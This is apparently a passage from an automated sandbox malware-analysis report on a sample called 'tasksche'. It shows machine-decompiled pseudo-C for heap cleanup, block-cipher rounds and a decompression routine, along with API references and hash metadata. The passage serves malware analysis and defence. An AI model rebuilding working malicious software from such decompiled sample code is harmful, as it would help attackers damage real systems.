                                                          						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          				return _t17;
                                                          			}









                                                          0x004029ce
                                                          0x004029d6
                                                          0x004029db
                                                          0x004029df
                                                          0x004029ea
                                                          0x004029ea
                                                          0x004029ef
                                                          0x00402a1d
                                                          0x00402a1d
                                                          0x00402a22
                                                          0x00402a2e
                                                          0x00402a31
                                                          0x00000000
                                                          0x004029f1
                                                          0x004029f2
                                                          0x004029f7
                                                          0x00402a12
                                                          0x00402a15
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004029f9
                                                          0x004029f9
                                                          0x004029fc
                                                          0x00402a01
                                                          0x00402a07
                                                          0x00402a0b
                                                          0x00402a0c
                                                          0x00402a0d
                                                          0x00000000
                                                          0x004029f9
                                                          0x004029ef
                                                          0x00402a45

                                                          APIs
                                                          • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$FreeProcessfree
                                                          • String ID:
                                                          • API String ID: 3428986607-0
                                                          • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                          • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                                                          • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                          • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 34%
                                                          			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
                                                          				signed int _v8;
                                                          				void* _v9;
                                                          				void* _v10;
                                                          				void* _v11;
                                                          				signed int _v12;
                                                          				void* _v13;
                                                          				void* _v14;
                                                          				void* _v15;
                                                          				signed int _v16;
                                                          				void* _v17;
                                                          				void* _v18;
                                                          				void* _v19;
                                                          				signed int _v20;
                                                          				void* _v21;
                                                          				void* _v22;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				intOrPtr _v32;
                                                          				char _v44;
                                                          				signed char* _t151;
                                                          				signed char* _t154;
                                                          				signed char* _t155;
                                                          				signed char* _t158;
                                                          				signed char* _t159;
                                                          				signed char* _t160;
                                                          				signed char* _t162;
                                                          				signed int _t166;
                                                          				signed int _t167;
                                                          				signed char* _t172;
                                                          				signed int* _t245;
                                                          				signed int _t262;
                                                          				signed int _t263;
                                                          				signed int _t278;
                                                          				signed int _t279;
                                                          				signed int _t289;
                                                          				signed int _t303;
                                                          				intOrPtr _t344;
                                                          				void* _t345;
                                                          				signed int _t346;
                                                          
                                                          				_t344 = __ecx;
                                                          				_v32 = __ecx;
                                                          				if( *((char*)(__ecx + 4)) == 0) {
                                                          					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                          					_push(0x40d570);
                                                          					_push( &_v44);
                                                          					L0040776E();
                                                          				}
                                                          				_t151 = _a4;
                                                          				_t154 =  &(_t151[3]);
                                                          				_t155 =  &(_t154[1]);
                                                          				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
                                                          				_v20 = _t278;
                                                          				_t158 =  &(_t155[3]);
                                                          				_t159 =  &(_t158[1]);
                                                          				_t160 =  &(_t159[1]);
                                                          				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
                                                          				_t162 =  &(_t160[2]);
                                                          				_t163 =  &(_t162[1]);
                                                          				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
                                                          				_v24 = _t262;
                                                          				_t166 =  *(_t344 + 0x410);
                                                          				_v28 = _t166;
                                                          				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
                                                          				if(_t166 > 1) {
                                                          					_a4 = _t344 + 0x30;
                                                          					_v8 = _t166 - 1;
                                                          					do {
                                                          						_t245 =  &(_a4[8]);
                                                          						_a4 = _t245;
                                                          						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
                                                          						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
                                                          						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
                                                          						_t262 = _v24;
                                                          						_v24 = _t262;
                                                          						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
                                                          						_t80 =  &_v8;
                                                          						 *_t80 = _v8 - 1;
                                                          						_v20 = _t278;
                                                          					} while ( *_t80 != 0);
                                                          					_t166 = _v28;
                                                          					_t344 = _v32;
                                                          				}
                                                          				_t167 = _t166 << 5;
                                                          				_t86 = _t344 + 8; // 0x8bf9f759
                                                          				_t279 =  *(_t167 + _t86);
                                                          				_t88 = _t344 + 8; // 0x40355c
                                                          				_t345 = _t167 + _t88;
                                                          				_v8 = _t279;
                                                          				_t172 = _a8;
                                                          				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
                                                          				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
                                                          				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
                                                          				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
                                                          				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
                                                          				_t104 = _t345 + 4; // 0x33c12bf8
                                                          				_t289 =  *_t104;
                                                          				_v8 = _t289;
                                                          				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
                                                          				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
                                                          				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
                                                          				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
                                                          				_t121 = _t345 + 8; // 0x6ff83c9
                                                          				_t303 =  *_t121;
                                                          				_v8 = _t303;
                                                          				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
                                                          				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
                                                          				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
                                                          				_t263 = _t262 & 0x000000ff;
                                                          				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
                                                          				_t137 = _t345 + 0xc; // 0x41c1950f
                                                          				_t346 =  *_t137;
                                                          				_v8 = _t346;
                                                          				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
                                                          				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
                                                          				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
                                                          				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
                                                          				_t172[0xf] =  *_t148 ^ _v8;
                                                          				return _t172;
                                                          			}










































                                                          0x00402e85
                                                          0x00402e87
                                                          0x00402e8e
                                                          0x00402e98
                                                          0x00402ea1
                                                          0x00402ea6
                                                          0x00402ea7
                                                          0x00402ea7
                                                          0x00402eac
                                                          0x00402eca
                                                          0x00402ed4
                                                          0x00402ed5
                                                          0x00402ee0
                                                          0x00402eef
                                                          0x00402ef5
                                                          0x00402eff
                                                          0x00402f00
                                                          0x00402f11
                                                          0x00402f17
                                                          0x00402f18
                                                          0x00402f26
                                                          0x00402f36
                                                          0x00402f3e
                                                          0x00402f4c
                                                          0x00402f4f
                                                          0x00402f59
                                                          0x00402f5c
                                                          0x00402f5f
                                                          0x00402fbf
                                                          0x00402fcc
                                                          0x00402fd6
                                                          0x00403016
                                                          0x00403031
                                                          0x0040303b
                                                          0x0040303e
                                                          0x00403041
                                                          0x00403044
                                                          0x00403044
                                                          0x00403047
                                                          0x00403047
                                                          0x00403050
                                                          0x00403053
                                                          0x00403053
                                                          0x00403056
                                                          0x00403059
                                                          0x00403059
                                                          0x0040305d
                                                          0x0040305d
                                                          0x00403068
                                                          0x00403078
                                                          0x0040307b
                                                          0x0040308f
                                                          0x0040309a
                                                          0x004030a4
                                                          0x004030b8
                                                          0x004030bb
                                                          0x004030bb
                                                          0x004030c4
                                                          0x004030d1
                                                          0x004030e5
                                                          0x004030fa
                                                          0x0040310e
                                                          0x00403111
                                                          0x00403111
                                                          0x0040311a
                                                          0x00403127
                                                          0x0040313b
                                                          0x0040314e
                                                          0x00403154
                                                          0x00403162
                                                          0x00403165
                                                          0x00403165
                                                          0x0040316f
                                                          0x0040317f
                                                          0x00403194
                                                          0x004031a8
                                                          0x004031ab
                                                          0x004031b5
                                                          0x004031b9

                                                          APIs
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
                                                          • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ??0exception@@ExceptionThrow
                                                          • String ID:
                                                          • API String ID: 941485209-0
                                                          • Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                                                          • Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
                                                          • Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                                                          • Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 33%
                                                          			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
                                                          				signed int _v8;
                                                          				void* _v9;
                                                          				void* _v10;
                                                          				void* _v11;
                                                          				signed int _v12;
                                                          				void* _v13;
                                                          				void* _v14;
                                                          				void* _v15;
                                                          				signed int _v16;
                                                          				void* _v17;
                                                          				void* _v18;
                                                          				void* _v19;
                                                          				signed int _v20;
                                                          				void* _v21;
                                                          				void* _v22;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				intOrPtr _v32;
                                                          				signed int _v36;
                                                          				char _v48;
                                                          				signed char* _t154;
                                                          				signed char* _t157;
                                                          				signed char* _t158;
                                                          				signed char* _t161;
                                                          				signed char* _t162;
                                                          				signed char* _t165;
                                                          				signed int _t169;
                                                          				signed int _t170;
                                                          				signed char* _t175;
                                                          				signed int _t243;
                                                          				signed int _t278;
                                                          				signed int _t288;
                                                          				signed int _t302;
                                                          				signed int* _t328;
                                                          				signed int _t332;
                                                          				signed int* _t342;
                                                          				intOrPtr _t343;
                                                          				void* _t344;
                                                          				signed int _t345;
                                                          
                                                          				_t343 = __ecx;
                                                          				_v32 = __ecx;
                                                          				if( *((char*)(__ecx + 4)) == 0) {
                                                          					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                          					_push(0x40d570);
                                                          					_push( &_v48);
                                                          					L0040776E();
                                                          				}
                                                          				_t154 = _a4;
                                                          				_t157 =  &(_t154[3]);
                                                          				_t158 =  &(_t157[1]);
                                                          				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
                                                          				_v24 = _t243;
                                                          				_t161 =  &(_t158[3]);
                                                          				_t162 =  &(_t161[1]);
                                                          				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
                                                          				_t165 =  &(_t162[3]);
                                                          				_t166 =  &(_t165[1]);
                                                          				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
                                                          				_t169 =  *(_t343 + 0x410);
                                                          				_v36 = _t169;
                                                          				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
                                                          				if(_t169 > 1) {
                                                          					_t328 = _t343 + 0x210;
                                                          					_a4 = _t328;
                                                          					_v8 = _t169 - 1;
                                                          					do {
                                                          						_t332 =  *0x00409BFC ^  *0x00409FFC;
                                                          						_v28 = _t332;
                                                          						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
                                                          						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
                                                          						_v12 = _v28;
                                                          						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
                                                          						_t342 = _a4;
                                                          						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
                                                          						_t328 = _t342 + 0x20;
                                                          						_t82 =  &_v8;
                                                          						 *_t82 = _v8 - 1;
                                                          						_a4 = _t328;
                                                          						_v24 = _t243;
                                                          					} while ( *_t82 != 0);
                                                          					_t343 = _v32;
                                                          					_t169 = _v36;
                                                          				}
                                                          				_t170 = _t169 << 5;
                                                          				_t278 =  *(_t343 + 0x1e8 + _t170);
                                                          				_t344 = _t343 + 0x1e8 + _t170;
                                                          				_v8 = _t278;
                                                          				_t175 = _a8;
                                                          				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
                                                          				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
                                                          				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
                                                          				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
                                                          				_t288 =  *(_t344 + 4);
                                                          				_v8 = _t288;
                                                          				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
                                                          				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
                                                          				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
                                                          				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
                                                          				_t302 =  *(_t344 + 8);
                                                          				_v8 = _t302;
                                                          				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
                                                          				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
                                                          				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
                                                          				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
                                                          				_t345 =  *(_t344 + 0xc);
                                                          				_v8 = _t345;
                                                          				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
                                                          				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
                                                          				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
                                                          				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
                                                          				return _t175;
                                                          			}










































                                                          0x004031c3
                                                          0x004031c5
                                                          0x004031cc
                                                          0x004031d6
                                                          0x004031df
                                                          0x004031e4
                                                          0x004031e5
                                                          0x004031e5
                                                          0x004031ea
                                                          0x00403206
                                                          0x00403210
                                                          0x00403211
                                                          0x0040321f
                                                          0x0040322e
                                                          0x00403234
                                                          0x0040323f
                                                          0x00403255
                                                          0x0040325b
                                                          0x00403266
                                                          0x0040327d
                                                          0x00403285
                                                          0x00403296
                                                          0x00403299
                                                          0x0040329f
                                                          0x004032a6
                                                          0x004032a9
                                                          0x004032ac
                                                          0x00403323
                                                          0x0040332f
                                                          0x0040334b
                                                          0x0040335a
                                                          0x0040336c
                                                          0x0040337b
                                                          0x00403385
                                                          0x00403388
                                                          0x0040338b
                                                          0x0040338e
                                                          0x0040338e
                                                          0x00403391
                                                          0x00403394
                                                          0x00403394
                                                          0x0040339d
                                                          0x004033a0
                                                          0x004033a0
                                                          0x004033a3
                                                          0x004033a6
                                                          0x004033ad
                                                          0x004033bb
                                                          0x004033cb
                                                          0x004033ce
                                                          0x004033e5
                                                          0x004033f8
                                                          0x0040340c
                                                          0x0040340f
                                                          0x00403418
                                                          0x00403425
                                                          0x00403439
                                                          0x0040344e
                                                          0x00403462
                                                          0x00403465
                                                          0x0040346e
                                                          0x0040347b
                                                          0x0040348f
                                                          0x004034a1
                                                          0x004034b5
                                                          0x004034b8
                                                          0x004034c2
                                                          0x004034d2
                                                          0x004034e7
                                                          0x004034fb
                                                          0x00403508
                                                          0x0040350c

                                                          APIs
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
                                                          • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ??0exception@@ExceptionThrow
                                                          • String ID:
                                                          • API String ID: 941485209-0
                                                          • Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                                                          • Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
                                                          • Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                                                          • Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E004043B7() {
                                                          				void* __ebx;
                                                          				void** __edi;
                                                          				void* __esi;
                                                          				signed int _t426;
                                                          				signed int _t427;
                                                          				void* _t434;
                                                          				signed int _t436;
                                                          				unsigned int _t438;
                                                          				void* _t442;
                                                          				void* _t448;
                                                          				void* _t455;
                                                          				signed int _t456;
                                                          				signed int _t461;
                                                          				signed char* _t476;
                                                          				signed int _t482;
                                                          				signed int _t485;
                                                          				signed int* _t488;
                                                          				void* _t490;
                                                          				void* _t492;
                                                          				void* _t493;
                                                          
                                                          				_t490 = _t492;
                                                          				_t493 = _t492 - 0x2c;
                                                          				_t488 =  *(_t490 + 8);
                                                          				_t485 =  *(_t490 + 0xc);
                                                          				_t482 = _t488[0xd];
                                                          				_t476 =  *_t485;
                                                          				 *(_t490 - 4) =  *(_t485 + 4);
                                                          				 *(_t490 + 8) = _t488[8];
                                                          				 *(_t490 + 0xc) = _t488[7];
                                                          				_t426 = _t488[0xc];
                                                          				 *(_t490 - 8) = _t482;
                                                          				if(_t482 >= _t426) {
                                                          					_t479 = _t488[0xb] - _t482;
                                                          					__eflags = _t479;
                                                          				} else {
                                                          					_t479 = _t426 - _t482 - 1;
                                                          				}
                                                          				_t427 =  *_t488;
                                                          				 *(_t490 - 0x10) = _t479;
                                                          				if(_t427 > 9) {
                                                          					L99:
                                                          					_push(0xfffffffe);
                                                          					_t488[8] =  *(_t490 + 8);
                                                          					_t488[7] =  *(_t490 + 0xc);
                                                          					 *(_t485 + 4) =  *(_t490 - 4);
                                                          					 *_t485 = _t476;
                                                          					_t320 = _t485 + 8;
                                                          					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
                                                          					__eflags =  *_t320;
                                                          					_t488[0xd] =  *(_t490 - 8);
                                                          					goto L100;
                                                          				} else {
                                                          					while(1) {
                                                          						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
                                                          							case 0:
                                                          								goto L7;
                                                          							case 1:
                                                          								goto L20;
                                                          							case 2:
                                                          								goto L27;
                                                          							case 3:
                                                          								goto L50;
                                                          							case 4:
                                                          								goto L58;
                                                          							case 5:
                                                          								goto L68;
                                                          							case 6:
                                                          								goto L92;
                                                          							case 7:
                                                          								goto L118;
                                                          							case 8:
                                                          								goto L122;
                                                          							case 9:
                                                          								goto L104;
                                                          						}
                                                          						L92:
                                                          						__eax =  *(__ebp + 8);
                                                          						 *(__esi + 0x20) =  *(__ebp + 8);
                                                          						__eax =  *(__ebp + 0xc);
                                                          						 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                          						__eax =  *(__ebp - 4);
                                                          						__edi[1] =  *(__ebp - 4);
                                                          						__ebx = __ebx -  *__edi;
                                                          						 *__edi = __ebx;
                                                          						__edi[2] = __edi[2] + __ebx -  *__edi;
                                                          						__eax =  *(__ebp - 8);
                                                          						 *(__esi + 0x34) =  *(__ebp - 8);
                                                          						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
                                                          						__eflags = __eax - 1;
                                                          						if(__eax != 1) {
                                                          							L120:
                                                          							_push(__eax);
                                                          							L100:
                                                          							_push(_t485);
                                                          							_push(_t488);
                                                          							_t434 = E00403BD6(_t479);
                                                          							L101:
                                                          							return _t434;
                                                          						}
                                                          						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                          						E004042AF( *(__esi + 4), __edi) = __edi[1];
                                                          						__ebx =  *__edi;
                                                          						 *(__ebp - 4) = __edi[1];
                                                          						__eax =  *(__esi + 0x20);
                                                          						_pop(__ecx);
                                                          						 *(__ebp + 8) =  *(__esi + 0x20);
                                                          						__eax =  *(__esi + 0x1c);
                                                          						_pop(__ecx);
                                                          						__ecx =  *(__esi + 0x34);
                                                          						 *(__ebp + 0xc) =  *(__esi + 0x1c);
                                                          						__eax =  *(__esi + 0x30);
                                                          						 *(__ebp - 8) = __ecx;
                                                          						__eflags = __ecx - __eax;
                                                          						if(__ecx >= __eax) {
                                                          							__eax =  *(__esi + 0x2c);
                                                          							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
                                                          							__eflags = __eax;
                                                          						} else {
                                                          							__eax = __eax - __ecx;
                                                          							__eax = __eax - 1;
                                                          						}
                                                          						__eflags =  *(__esi + 0x18);
                                                          						 *(__ebp - 0x10) = __eax;
                                                          						if( *(__esi + 0x18) != 0) {
                                                          							 *__esi = 7;
                                                          							goto L118;
                                                          						} else {
                                                          							 *__esi =  *__esi & 0x00000000;
                                                          							__eflags =  *__esi;
                                                          							L98:
                                                          							_t427 =  *_t488;
                                                          							__eflags = _t427 - 9;
                                                          							if(_t427 <= 9) {
                                                          								_t479 =  *(_t490 - 0x10);
                                                          								continue;
                                                          							}
                                                          							goto L99;
                                                          						}
                                                          						while(1) {
                                                          							L68:
                                                          							__eax =  *(__esi + 4);
                                                          							__ecx =  *(__esi + 8);
                                                          							__edx = __eax;
                                                          							__eax = __eax & 0x0000001f;
                                                          							__edx = __edx >> 5;
                                                          							__edx = __edx & 0x0000001f;
                                                          							_t187 = __eax + 0x102; // 0x102
                                                          							__eax = __edx + _t187;
                                                          							__eflags = __ecx - __edx + _t187;
                                                          							if(__ecx >= __edx + _t187) {
                                                          								break;
                                                          							}
                                                          							__eax =  *(__esi + 0x10);
                                                          							while(1) {
                                                          								__eflags =  *(__ebp + 0xc) - __eax;
                                                          								if( *(__ebp + 0xc) >= __eax) {
                                                          									break;
                                                          								}
                                                          								__eflags =  *(__ebp - 4);
                                                          								if( *(__ebp - 4) == 0) {
                                                          									L107:
                                                          									_t488[8] =  *(_t490 + 8);
                                                          									_t488[7] =  *(_t490 + 0xc);
                                                          									_t349 = _t485 + 4;
                                                          									 *_t349 =  *(_t485 + 4) & 0x00000000;
                                                          									__eflags =  *_t349;
                                                          									L108:
                                                          									_push( *(_t490 + 0x10));
                                                          									 *_t485 = _t476;
                                                          									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
                                                          									_t488[0xd] =  *(_t490 - 8);
                                                          									goto L100;
                                                          								}
                                                          								__edx =  *__ebx & 0x000000ff;
                                                          								__ecx =  *(__ebp + 0xc);
                                                          								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                          								 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                          								__edx = ( *__ebx & 0x000000ff) << __cl;
                                                          								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                          								__ebx = __ebx + 1;
                                                          								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                          							}
                                                          							__eax =  *(0x40bca8 + __eax * 4);
                                                          							__ecx =  *(__esi + 0x14);
                                                          							__eax = __eax &  *(__ebp + 8);
                                                          							__edx =  *(__ecx + 4 + __eax * 8);
                                                          							__eax = __ecx + __eax * 8;
                                                          							__eflags = __edx - 0x10;
                                                          							 *(__ebp - 0x14) = __edx;
                                                          							__ecx =  *(__eax + 1) & 0x000000ff;
                                                          							 *(__ebp - 0xc) = __ecx;
                                                          							if(__edx >= 0x10) {
                                                          								__eflags = __edx - 0x12;
                                                          								if(__edx != 0x12) {
                                                          									_t222 = __edx - 0xe; // -14
                                                          									__eax = _t222;
                                                          								} else {
                                                          									__eax = 7;
                                                          								}
                                                          								__ecx = 0;
                                                          								__eflags = __edx - 0x12;
                                                          								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
                                                          								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
                                                          								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
                                                          								__eflags = __ecx;
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								while(1) {
                                                          									__ecx =  *(__ebp - 0xc);
                                                          									__edx = __eax + __ecx;
                                                          									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
                                                          									if( *(__ebp + 0xc) >= __eax + __ecx) {
                                                          										break;
                                                          									}
                                                          									__eflags =  *(__ebp - 4);
                                                          									if( *(__ebp - 4) == 0) {
                                                          										goto L107;
                                                          									}
                                                          									__edx =  *__ebx & 0x000000ff;
                                                          									__ecx =  *(__ebp + 0xc);
                                                          									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                          									 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                          									__edx = ( *__ebx & 0x000000ff) << __cl;
                                                          									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                          									__ebx = __ebx + 1;
                                                          									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                          								}
                                                          								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
                                                          								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
                                                          								__ecx = __eax;
                                                          								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
                                                          								__ecx =  *(__ebp - 0xc);
                                                          								__eax = __eax +  *(__ebp - 0xc);
                                                          								__ecx =  *(__esi + 8);
                                                          								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
